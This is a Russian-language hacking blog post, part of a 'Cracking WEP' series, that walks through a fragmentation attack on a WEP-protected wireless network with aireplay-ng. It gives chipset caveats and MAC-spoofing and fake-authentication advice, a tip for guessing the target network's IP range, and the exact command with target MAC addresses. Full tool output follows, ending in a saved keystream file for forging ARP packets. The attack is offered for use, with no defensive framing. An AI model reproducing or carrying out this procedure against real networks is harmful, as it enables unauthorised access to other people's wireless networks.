![=[ x25-box.com ]=](http://www.x25-box.com/wp-content/themes/pixeled/images/rss-trans.png){kind=small}
Взламываем WEP. Сценарий 4. Создание пакета через fragmentation attack
Fragmentation attack очень похожа на chopchop attack, различие только в способе получения xor-файла.
Есть некоторые аппаратные ограничения для fragmentation attack:
• Не поддерживается prism чипсетами.
• На Athetos чипсете MAC вашей карты обязан совпадать с Src MAC’ом генерируемого пакета. Меняйте MAC.
• Иногда не очень хорошо работает на ralink.
Во-первых, вы должны поставить MAC-адрес клиента, уже ассоциированного с точкой или провести fake authentication. Основная проблема заключается в определении, какой IP использовать в “aireplay-ng -5”, поскольку теоретически вы не знаете диапазон ломаемой сети. Для решения этой проблемы существуют разные способы. Во-первых, неплохим вариантом будет являться использование диапазонов, устанавливаемых по умолчанию на AP данной модели: очень немногие люди меняют стандартные настройки. Другой способ – узнать внутренний IP через заголовки web-страниц, e-mail’ов и т.п. В общем, здесь необходим творческий подход.
Так же есть трюк, работающий на большинстве AP: просто используйте 255.255.255.255. По умолчанию, aireplay-ng использует 255.255.255.255 и для Src и для Dst IP.
# aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:0F:B5:46:11:19 ath0
Size: 144, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:14:6C:7E:40:80
Dest. MAC = 00:0F:B5:46:11:19
Source MAC = 00:0D:60:2E:CC:E1
0x0000: 0842 0201 000f b546 1119 0014 6c7e 4080 .B.....F....l~@.
0x0010: 000d 602e cce1 1083 7214 0000 5da7 d458 ..`.....r...]..X
0x0020: 6c90 0329 12ab 3d03 c37d 600b cdac 2706 l..)..=..}`...'.
0x0030: 19c7 9253 65b3 f163 1a17 8005 04ff 961f ...Se..c........
0x0040: 01c4 0f6a 0047 e38b cb00 c303 f805 d96f ...j.G.........o
0x0050: 6c14 2479 bb5b aae3 f5f4 4f40 fc42 d703 l.$y.[....O@.B..
0x0060: 8d49 1b91 4d5e 0787 a737 1d18 62a2 a828 .I..M^...7..b..(
0x0070: 75ab fdbb e3c2 e276 18c9 7641 a655 a4d2 u......v..vA.U..
0x0080: acc4 d9f9 8c1b a12b be35 99a7 b793 5bec .......+.5....[.
Use this packet ? y
Saving chosen packet in replay_src-0113-170504.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0113-170526.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
Ну вот и отлично – файл fragment-0113-170526.xor является необходимым для создания arp-пакета xor-файлом.
Начиная с этого момента, атака полностью идентична chopchop атаке.
-
-----------------------------------------------------
Welcome to =[ x25-box.com ]=
блог проекта x25-box. Обсуждение сетей x25, tcp/ip. wifi, security research, hacking,
Новостная лента RSS.
-----------------------------------------------------
---------------[ Donation Bar ]---------------
- Как сюда попасть
- www.x25.com.ru(4$)
- Poker Room(3.5$)
- Lechenie zavisimostey(3.2$)
- aikibudo(3$)
- www.25.net.ru(2.5$)
-----------------------------------------------------
Packet Switching and X.25 Networks
[ статистика ]
